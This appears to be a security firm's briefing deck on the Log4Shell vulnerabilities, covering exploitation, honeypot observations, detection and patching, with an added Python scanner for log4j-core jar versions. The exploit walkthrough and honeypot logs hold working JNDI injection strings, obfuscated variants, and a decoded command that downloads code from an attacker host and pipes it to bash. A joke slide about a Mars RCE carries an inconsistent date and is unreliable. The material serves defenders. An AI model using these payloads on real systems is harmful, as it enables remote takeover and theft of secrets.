Log4j CVE-2021-44228 CVE-2021-45046 - David Olander, CTO MSS Nordics & DACH Charl van der Walt, Head of Security Research - Orange ...
Log4j CVE-2021-44228 CVE-2021-45046
David Olander, CTO MSS Nordics & DACH
Charl van der Walt, Head of Security Research
Log4j - CVE-2021-44228 (Released 9th of December)
• A vulnerability impacting Log4j versions 2.0 through 2.14.1 was disclosed on the project’s GitHub on December 9, 2021. The flaw has been dubbed “Log4Shell,” and has the highest possible severity rating of 10.
• Log4j is an open source Java logging library that is widely used in a range of software applications and services around the world. The vulnerability can allow threat actors to take control of any Java-based, internet-facing server and engage in remote code execution (RCE) attacks.
• https://nvd.nist.gov/vuln/detail/CVE-2021-44228
• https://www.cybereason.com/blog/cybereason-releases-vaccine-to-prevent-exploitation-of-apache-log4shell-vulnerability-cve-2021-44228
Confidential
Log4j - CVE-2021-45046 (Released on 14th of Dec)
• Initially there was speculation on a couple of things:
• A later Java version would provide some protection due to the fact that it does not allow execution of untrusted class files
• This has now been bypassed
• https://twitter.com/marcioalm/status/1470361495405875200
• Setting -Dlog4j2.formatMsgNoLookups=true in the command line arguments when starting the application would mitigate the issue
• https://twitter.com/marcioalm/status/1470361495405875200
• This is not the case for all scenarios
• https://github.com/apache/logging-log4j2/pull/608#issuecomment-993542299
• Based on these findings CVE-2021-45046 was released
How bad is it?
Shellshock (CVE-2014-6271):
• Allows remote code execution
• Very widespread
• Limited to Bash (Unix systems)
• Medium complexity to mitigate / find affected systems
• CVSS 9.8/10
• https://nvd.nist.gov/vuln/detail/CVE-2014-6271
Log4shell (CVE-2021-44228):
• Allows remote code execution
• Very widespread
• Huge attack surface (All OS’s)
• Difficult to mitigate / find affected systems
• CVSS 10/10
• https://nvd.nist.gov/vuln/detail/CVE-2021-44228
Testing for it
• The vulnerability can be very hard to find:
• You can use your vulnerability scanner and scan for it and get a reply X hours later. This can happen if you have a batch job running that uses log4j somewhere else
• When you get the answer back you can still be uncertain which system is vulnerable, as the data has traversed your network
• This is one of the key differentiators compared to other vulnerabilities
• If you do not know all connections between all applications this can be a nightmare to find and then to mitigate
• Use all the tools you have; this only affects Log4j, and that requires Java
• Axonius, vulnerability management, sysadmin tools, CMDB - all could have answers to where you run Java and are using Log4j
The complexity of the vulnerability
• As information is sent and exchanged between applications, chances are that Log4j will be present somewhere. The challenge is to find it.
(Diagram: Frontend, Auth, Backend, Database server, Clients/Servers, a weekly sync job and a daily sync job, each marked “Log4j?”)
Exploit in 6 easy steps
(Sequence diagram: Attacker, Attacker-ldap-server, Attacker-http-server, Victim)
1. Request sent to victim:
GET / HTTP/1.1
User-Agent: ${jndi:ldaps://attacker-ldap-server:443/a}
2. Vulnerable application responds back with an LDAP query
3. LDAP server responds with information pointing to exploit code:
dn:
javaClassName: foo
javaCodeBase: http://attacker-http-server
objectClass: javaNamingReference
javaFactory: Exploit
4. Client requests exploit code download (Request Exploit.class)
5. Client downloads exploit code (Download Exploit.class)
6. Client loads and executes exploit code (Executes Exploit.class)
Stealing secrets
• If environment variables are set, they could also be referenced and fetched inside the Java context
• In this example by Marcus Hutchins an AWS_SECRET_ACCESS_KEY is set on the server. In the screenshot, this variable is fetched
• It could also be database connection strings and passwords
• https://twitter.com/MalwareTechBlog/status/1470092256359043076
Stealing secrets
• External data by the community
• Secrets being stolen: AWS, Docker, Hadoop
• Payloads: Ransomware 4%, Cryptominer 22%, Info stealer 61%, Unknown 13%
Via e-mail
• Attackers are using e-mail to include links in the subject
It is also the first confirmed RCE vulnerability on Mars
• Confirmed by Apache Software Foundation on the 4th of June 2021
OCD data - already seeing obfuscation techniques
• Our honeypot data shows active exploitation started on the 10th
• Attackers are working on obfuscation to slip through signature-based defenses
45.155.205.233 - - [10/Dec/2021:18:50:56 +0000] "GET / HTTP/1.1" 301 - "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8zNC44OC4yMDQuMjIwOjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8zNC44OC4yMDQuMjIwOjQ0Myl8YmFzaA==}"
45.155.205.233 - - [10/Dec/2021:18:50:58 +0000] "GET / HTTP/1.1" 200 14794 "https://34.88.204.220:443/" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8zNC44OC4yMDQuMjIwOjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8zNC44OC4yMDQuMjIwOjQ0Myl8YmFzaA==}"
167.71.13.196 - - [11/Dec/2021:07:51:15 +0000] "GET /$%7Bjndi:ldaps://e969c767.probe001.log4j.leakix.net:443/b%7D?${jndi:ldaps://e969c767.probe001.log4j.leakix.net:443/b}=${jndi:ldaps://e969c767.probe001.log4j.leakix.net:443/b} HTTP/1.1" 404 196 "-" "${jndi:ldaps://e969c767.probe001.log4j.leakix.net:443/b}"
167.71.13.196 - - [11/Dec/2021:07:51:17 +0000] "GET /$%7Bjndi:ldaps://e969c767.probe001.log4j.leakix.net:443/b%7D?${jndi:ldaps://e969c767.probe001.log4j.leakix.net:443/b}=${jndi:ldaps://e969c767.probe001.log4j.leakix.net:443/b} HTTP/1.1" 404 196 "-" "${jndi:ldaps://e969c767.probe001.log4j.leakix.net:443/b}"
5.157.38.50 - - [11/Dec/2021:13:13:51 +0000] "GET /${jndi:ldap://45.130.229.168:1389/Exploit} HTTP/1.1" 404 196 "-" "curl/7.58.0"
46.101.223.115 - - [11/Dec/2021:17:25:14 +0000] "GET / HTTP/1.1" 200 14794 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}"
46.101.223.115 - - [11/Dec/2021:19:02:57 +0000] "GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1" 404 196 "-" "Kryptos Logic Telltale"
1.116.59.211 - - [11/Dec/2021:21:29:44 +0000] "GET /${jndi:ldap://45.130.229.168:1389/Exploit} HTTP/1.1" 404 196 "-" "curl/7.58.0"
138.197.9.239 - - [12/Dec/2021:00:10:32 +0000] "GET / HTTP/1.1" 200 3421 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
138.197.9.239 - - [12/Dec/2021:01:30:58 +0000] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 404 437 "-" "Kryptos Logic Telltale"
159.223.61.102 - - [12/Dec/2021:05:23:08 +0000] "GET / HTTP/1.1" 200 3477 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"
159.223.61.102 - - [12/Dec/2021:05:23:08 +0000] "GET /favicon.ico HTTP/1.1" 404 492 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"
89.249.63.3 - - [12/Dec/2021:05:39:09 +0000] "GET /${jndi:ldap://45.130.229.168:1389/Exploit} HTTP/1.1" 404 437 "-" "curl/7.58.0"
Looking at the payloads being dropped
• Java class files that create a command shell back to attackers
• In the example to the right you can see support for both Windows and Linux/Unix environments
• https://twitter.com/an0n_r0/status/1469416507440615425
Payloads - one request with 3 different techniques
195.54.160.149 - - [14/Dec/2021:01:48:30 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xODguMTY2Ljk2LjEwNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xODguMTY2Ljk2LjEwNDo4MCl8YmFzaA==} HTTP/1.1" 200 3440 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xODguMTY2Ljk2LjEwNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xODguMTY2Ljk2LjEwNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xODguMTY2Ljk2LjEwNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xODguMTY2Ljk2LjEwNDo4MCl8YmFzaA==}"
• In one request it tries 3 different ways of obfuscation.
• Base64 decodes to this: (curl -s 195.54.160.149:5874/188.166.96.104:80||wget -q -O- 195.54.160.149:5874/188.166.96.104:80)|bash
• (Payload not active at the time of investigation)
CyberSOC Nordics & DACH status
• Incidents, service requests, change requests related to CVE-2021-44228 and CVE-2021-45046
How do I know if I am compromised?
• The actual initial compromise will be the same as any other infection (Mirai, cryptominer, Cobalt Strike or any other malware). Attackers will leverage this vulnerability and deploy their “regular” toolset
• If you have good detection capabilities in place you increase the likelihood of detecting step 2, 3 etc.
• This means having complete control over detection capabilities is very important
The good side is using it too
To provide you with some information on the extent of the vulnerability
• Replies back from scammers’ internal infrastructure
• Sending a text message to senders of scam text messages
• https://twitter.com/p_malynin/status/1469866520939429889
Finding real IP address behind Tor hidden servers
• You would assume that our adversaries do a bit of logging to detect when things go bad on their Tor hidden server
• This vulnerability is likely being used by the good side to find the real IP addresses of malicious actors that host infrastructure on Tor (think ransomware operators)
(Diagram: goal is to get the real IP of this service; Tor hidden services are what makes it possible for malicious actors to hide their infrastructure)
Timeline
Timeline December - what can be expected (1/12, 9/12, 10/12, 11/12, 12/12, 13/12, 14/12, 15/12, 16/12)
• First use of the vulnerability
• Vulnerability disclosed on Minecraft
• Official CVE published CVE-2021-44228
• First exploit payloads being dropped
• Crowdstrike publishes information that nation state actors are preparing payloads
• Ransomware payloads confirmed by Cloudflare CEO
• Confirmed payloads with cryptominers, ransomware and other payloads (Mirai etc.)
• 2.15 determined incomplete fix. New CVE released CVE-2021-45046
• Apache updates advice: Log4j 2.12.2 for Java 7 and 2.16.0 for Java 8 and up now fixes CVE-2021-45046 and CVE-2021-44228
• Multiple sources now confirm access brokers connected with ransomware affiliates and nation state groups have started to use the vulnerability
Sources:
https://twitter.com/eastdakota/status/1469800951351427073?s=21
https://twitter.com/eastdakota/status/1470819030155993089
https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/
https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/#nation-state
https://blog.checkpoint.com/2021/12/13/the-numbers-behind-a-cyber-pandemic-detailed-dive/
https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://nvd.nist.gov/vuln/detail/CVE-2021-45046
https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/
Mitigations
How do I know if I am vulnerable?
• Follow this simple flowchart and work through your entire environment
• Remember, we are not only concerned about external applications.
• We also need to find everything related to internal applications as well (remember how data traverses the network)
Flowchart:
Is my app using Java? No: Not vulnerable. Yes:
Is it using Log4j? No: Not vulnerable. Yes:
Are you using Java 7? Yes: Is it using a version earlier than 2.12.2? Yes: You need to patch (and upgrade Java..)
Are you using Java 8? Yes: Is it using a version earlier than 2.16.0? Yes: You need to patch
Neither Java 7 nor Java 8: You need to upgrade and patch
Recommended version of Log4j as of 2021-12-15 is 2.16.0 or greater for Java 8 and 2.12.2 or greater for Java 7
NOTE! Java 7 is end of life July 2022 (Released in 2011) - Java 8 EOL Dec 2030 https://www.oracle.com/java/technologies/java-se-support-roadmap.html
Please follow: https://logging.apache.org/log4j/2.x/
But what about Log4j 1.2?
• But I am using Log4j 1.2?
• Am I ok?
• No
• There are more vulnerabilities in 1.2, and it was end of life in 2015
• https://logging.apache.org/log4j/1.2/
• Once again: Recommended version of Log4j as of 2021-12-15 is 2.16.0 or greater for Java 8 and 2.12.2 or greater for Java 7
Flowchart:
Is my app using Java? No: Not vulnerable. Yes:
Is it using Log4j? No: Not vulnerable. Yes:
Is it version 1.2? No: Not vulnerable. Yes:
Is JMSAppender enabled? No: You need to patch (CVE-2019-17571). Yes: You need to patch (CVE-2021-4104)
CVE-2019-17571: Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget when listening to untrusted network traffic for log data. This affects Log4j versions up to 1.2 up to 1.2.17.
CVE-2021-4104: JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default.
But I have a really old version of Log4j?
• Recommended version of Log4j is 2.16.0 or greater for Java 8 and 2.12.2 or greater for Java 7
• If you are using Java 6, you have a lot of other issues as well
Log4j vaccine
• Released by Cybereason
• https://www.cybereason.com/blog/cybereason-releases-vaccine-to-prevent-exploitation-of-apache-log4shell-vulnerability-cve-2021-44228
• https://github.com/Cybereason/Logout4Shell
• Will not survive a restart of the app - only temporary mitigation for systems that do not have a patch ready
Log4j vaccine - IMPORTANT TO UNDERSTAND!
• Will not survive a restart of the app - only temporary mitigation for systems that do not have a patch ready
Removing the JndiLookup class
• For specific versions you can remove the JndiLookup class from the classpath for the application
• https://logging.apache.org/log4j/2.x/
• zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
• We recommend everyone following the official recommendations by Apache on the Log4j website
• https://logging.apache.org/log4j/2.x/
Upgrading Java
• In some scenarios you will not be able to update Log4j because you are running an older version of Java (e.g. Java 6 or older)
• This means that you may have to rewrite your entire application to support Java 7/8 to then do the upgrade and mitigate the vulnerability
• As of Log4j 2.13.0 Log4j 2 requires Java 8 or greater at runtime
• https://logging.apache.org/log4j/2.x/
Java support
• Recommended version of Log4j as of 2021-12-15 is 2.16.0 or greater for Java 8 and 2.12.2 or greater for Java 7
• Java 7 is end of life July 2022 (Released in 2011) https://www.oracle.com/java/technologies/java-se-support-roadmap.html
• Java 8 end of life in Dec 2030
• Please make sure you follow the official channel at Apache
Please follow: https://logging.apache.org/log4j/2.x/
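The vulnerability flowchart, the JndiLookup removal slide and the Java support slide together describe one check: find every log4j-core jar (including those nested in .war/.ear archives), read its version, see whether JndiLookup.class is still present, and compare the version with the 2021-12-15 recommendation for the Java major in use. The scanner below is an added example, not code from the deck or from the Log4j project. It reads the version from the Maven pom.properties that real log4j-core jars carry; the sample tree it builds contains constructed stub jars with only those marker entries, and the function names are this example's own.

```python
"""Added example: inventory log4j-core jars under a directory tree and apply the deck's
recommendation (2.12.2+ on Java 7, 2.16.0+ on Java 8 and later). The jars built by
build_sample_tree() are constructed stubs, not real Log4j releases."""
import io
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); keeps only the leading digits of each part ('0-rc1' -> 0)."""
    parts = []
    for p in text.split(".")[:3]:
        m = re.match(r"\d+", p)
        parts.append(int(m.group()) if m else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def minimum_for_java(java_major):
    """Deck recommendation: 2.12.2 for Java 7, 2.16.0 for Java 8 and up; older Java must be upgraded."""
    if java_major >= 8:
        return (2, 16, 0)
    if java_major == 7:
        return (2, 12, 2)
    return None


def assess(version, java_major):
    minimum = minimum_for_java(java_major)
    if minimum is None:
        return "upgrade-java-and-patch"
    if version is None:
        return "unknown-version"
    return "ok" if parse_version(version) >= minimum else "patch"


def inspect_archive(zf, location, java_major, findings):
    """Record a finding if this archive is log4j-core; recurse into nested archives."""
    names = set(zf.namelist())
    if POM_PROPS in names:
        version = None
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
        findings.append({"location": location, "version": version,
                         "has_jndi_lookup": JNDI_CLASS in names,
                         "verdict": assess(version, java_major)})
    for name in names:
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                nested = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            inspect_archive(nested, location + "!" + name, java_major, findings)


def scan_tree(root, java_major):
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fn)
                try:
                    with zipfile.ZipFile(path) as zf:
                        rel = os.path.relpath(path, root).replace(os.sep, "/")
                        inspect_archive(zf, rel, java_major, findings)
                except zipfile.BadZipFile:
                    continue
    return sorted(findings, key=lambda f: f["location"])


def _stub_log4j_core(version, include_jndi_lookup=True):
    """Constructed stub jar carrying only the two entries the scanner looks for."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, "artifactId=log4j-core\nversion=%s\n" % version)
        if include_jndi_lookup:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


def build_sample_tree():
    """Constructed sample: three stub jars plus a .war with a nested log4j-core."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    os.makedirs(os.path.join(root, "app1", "lib"))
    with open(os.path.join(root, "app1", "lib", "log4j-core-2.14.1.jar"), "wb") as fh:
        fh.write(_stub_log4j_core("2.14.1"))
    with open(os.path.join(root, "app1", "lib", "log4j-core-2.16.0.jar"), "wb") as fh:
        fh.write(_stub_log4j_core("2.16.0"))
    # Same vulnerable version after the 'zip -q -d' interim mitigation from the deck
    with open(os.path.join(root, "mitigated-log4j-core-2.14.1.jar"), "wb") as fh:
        fh.write(_stub_log4j_core("2.14.1", include_jndi_lookup=False))
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.12.1.jar", _stub_log4j_core("2.12.1"))
    with open(os.path.join(root, "app2.war"), "wb") as fh:
        fh.write(war.getvalue())
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree(), java_major=8):
        print(f)
```

The verdict is driven by the version alone, so a jar with JndiLookup.class removed still reports "patch": the has_jndi_lookup flag only tells you the interim mitigation is in place, which matches the deck's advice that class removal and the vaccine are temporary measures until the upgrade is done.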
Recommended actions
Recommended actions
What is the attack surface? / Can we do short term mitigations? / Can we apply vendor patches?
Discover:
• Use vulnerability management tools (Rapid 7 etc)
• Or system inventory tools (Axonius etc)
• Or sysadmin tools (Bigfix etc)
• Open source tools
• Or EDR/Sysmon tools to accomplish:
1. Find systems that are using Java
2. Zoom in on systems that are then using log4j
3. Mitigate
• Do not forget third party or SaaS apps that you are using
Mitigation - short term:
• Turn off vulnerable application
• Block attacks using any technology available
• Change settings of running application
• Remove JNDI classes
• Apply “vaccine”
• Upgrade Java (if needed)
• Upgrade Log4j
Mitigation - long term:
• Block attacks using any technology available
• Patch
• Upgrade Java (if needed)
• Upgrade Log4j
• Apply patches
Customers not using MDR services
Detections
• For customers not using Orange Cyberdefense MDR services we have the following recommendations:
• EDR:
• If you have an EDR tool look for processes that include command line java when starting
• This can help you find applications that are vulnerable
• Same with Sysmon, look at process command line arguments
• Could also be interesting to look at java starting outbound connections
• LOG:
• If you have log data look for outgoing requests that have a User-Agent of Java/$(version)
• Can also be valuable to compare apps, ports and protocols. I.e. is it ldap using port 80
• Also outgoing ldap connections from internal to external
• NTA:
• Any traffic anomalies that relate to apps, ports and protocols. Look at http or ldap specifically
• Suspicious User-Agents in web traffic
Resources - Orange Cyberdefense
• Orange Cyberdefense public IOCs (updated hourly)
• https://github.com/Orange-Cyberdefense/log4shell_iocs
• Blog post
• https://orangecyberdefense.com/global/blog/threat/log4j-vulnerability/
• Log4j RCE test environment by Leon Jacobs, Pentest Chief Technology Officer
• https://github.com/leonjza/log4jpwn
Resources - public
• Canarytokens can help if you want to know if the app is vulnerable
• https://canarytokens.org/generate#
• Axonius has provided searches to help find vulnerable apps
• https://www.axonius.com/blog/tracking-log4shell-and-related-applications-with-axonius
• Detecting exploitation
• https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
• List of vulnerable applications and vendors
• https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
• List of vulnerability advisories for different products
• https://github.com/cisagov/log4j-affected-db
• Dutch government (Nationaal Cyber Security Centrum) information page
• https://github.com/NCSC-NL/log4shell
What is Orange Cyberdefense doing
What are we doing?
• Vendor collaboration and coordination regarding patches
• Helping our customers in our MDR, SOC and vulnerability services
• Stopping attacks on ourselves - protecting our customers is priority 1
• CyberSOC and SOC working on all fronts
• Updating information as we go to all customers - World Watch / web site
• https://orangecyberdefense.com/global/blog/threat/log4j-vulnerability/
• Updating and deploying any detection rules in our services - where applicable